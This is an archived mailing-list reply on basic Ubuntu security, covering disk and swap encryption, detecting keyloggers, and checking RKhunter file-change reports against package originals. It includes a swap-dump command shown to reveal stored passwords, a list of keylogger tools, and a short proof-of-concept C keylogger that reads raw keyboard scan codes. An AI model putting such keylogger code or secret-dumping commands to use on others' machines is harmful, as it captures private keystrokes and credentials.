[HacktionLab] Basic security practice for Ubuntu

johnc johnc at aktivix.org
Wed May 8 01:39:07 UTC 2013 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I'll have a stab at answering this:

* As regards having an encrypted hard drive, hopefully that includes
swap, root and home .... and the rest just excluding /boot. The last
time I checked you couldn't do a fully encrypted install with the
Ubuntu installer. It was one of the many reasons I changed to Debian.
(This fact may be out of date though?!). To see why this is important
do the following to your swap partition ( replace /dev/sda3 as
appropriate).

strings /dev/sda3 >dump.txt
This is mostly rubbish but I found wifi passwords in here before!

* With Linux, It's hard to get a key logger onto your computer
especially if you only ever install with packages from trusted repos.
If you never let the computer out of your site, you are probably ok :-).

There's no shortage of key loggers though: lkl, uberkey, THC-vlogger,
PyKeylogger, logkeys etc.

I wrote one in a few lines of C as a proof of concept. This is
horribly crude. It only logs raw scan codes from the keyboard buffer
but you wouldn't have to do much to extract the characters typed.

include <stdio.h>
#include<unistd.h>
#include</usr/include/x86_64-linux-gnu/sys/io.h>

void main(){

  ioperm(0x0060, 1, 1);

  while(inb(0x0060)!=1)
    printf("\nKey: %i", inb(0x0060));
}
gcc -o log ./log.c # to compile

* detecting anything other than the common keyboard loggers would be hard.

I like RKhunter :-). I don't think there is a quick way to tell if
reported file changes are bad but you could diff the file with the
original.

Find out what package the file "foo" belongs to:
 aptitude install apt-file
 apt-file update
 apt-file search foo

say it was in package "bar":
Download package and extract file foo
 mkdir mytemp
 cd mytemp
 aptitude download bar
Install binutils to get ar extraction utility:
 aptitude install binutils
 ar -x bar.deb
 tar -zxvf data.tar.gz
Say the file foo was in etc, the extracted file is in ./mytemp/etc/foo
Diff them:
 diff /etc/foo ./mytemp/etc/foo | less
Then go and check out what those changed lines mean via the man or a wiki.

Cheers,
John

On 07/05/13 16:30, sam at bristolwireless.net wrote:
> 
> Hi All
> 
> I run Ubuntu
> 
> I'm interested in keeping my machine reasonably secure.
> 
> I have an encrypted hard drive
> 
> I occasionally run RKhunter, it doesn't show any rootkits, but 
> shows that some files have been changed. I'm unsure how to use
> this information.
> 
> Is there a easy way of scanning for software keyloggers?
> 
> 
> Thanks
> 
> Sam
> 
> 
> 
> 
> _______________________________________________ HacktionLab
> mailing list HacktionLab at lists.aktivix.org 
> https://lists.aktivix.org/mailman/listinfo/hacktionlab

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJRiay7AAoJELy1jPQ1KER7ef8QAMdyJmlGK7ZehhT0ICMzWtFw
YzxqmiIvHLH6xrpz0DzQvRcOTJaGbCh038I+7X+AvEokz/77VV6zEpQGQMy7wmxQ
1VhNrS0UYpcXALXplQwEAxKwJqI6s4s7JHBDiPndv+GzWso4ajY+vwRmyD/HDOvd
wAGDQpdjamJe3qZMgOZGv3EPnOcECHIk43EUiBbAxteFye8RdeEJ49E8X5RjB+WR
ny4uZtwrdge3fnTH3ZgE7dbe4d0VltJ8eht09dZFtlqwkvZphDnwdFghM+FgkvkI
dhPKGgMXZ51/xQeTB3CBBq8XNmr9xhOt9OjAYydlmLH+3w6QkIdB8icRtMbSCZQp
CFuSprRe+EhkUvOl/Nt4G8aDBnqEA8+UyLx78yWKe9a49TJ3tXqbLxCzhCug89Zw
5TZSlSiiVuy30a9XpLtXGeFMI8kEKSdqi9K+tXB28KPACmqR9/4bi3F9O5XZToxQ
i0XPTdf5JQ+yyeCjsOzGq1a4T0hIWqenAPXabS0O2MHRUktXbowrptir0a3KbdNU
lkMNG37gzVrZiz7p41YLxSLUGbeLbaDvF1zqUxiTgRcf49QiZ9S/zlnwBh5thvqZ
+LDGGfH3x/52UoeymLWjQ1XpFjByOxQiy9DtkuXBIl7jvKvboVYB6mh2MBtNYpaV
R2oFA9XH2/S+7sulmz2d
=Q9RT
-----END PGP SIGNATURE-----

More information about the HacktionLab mailing list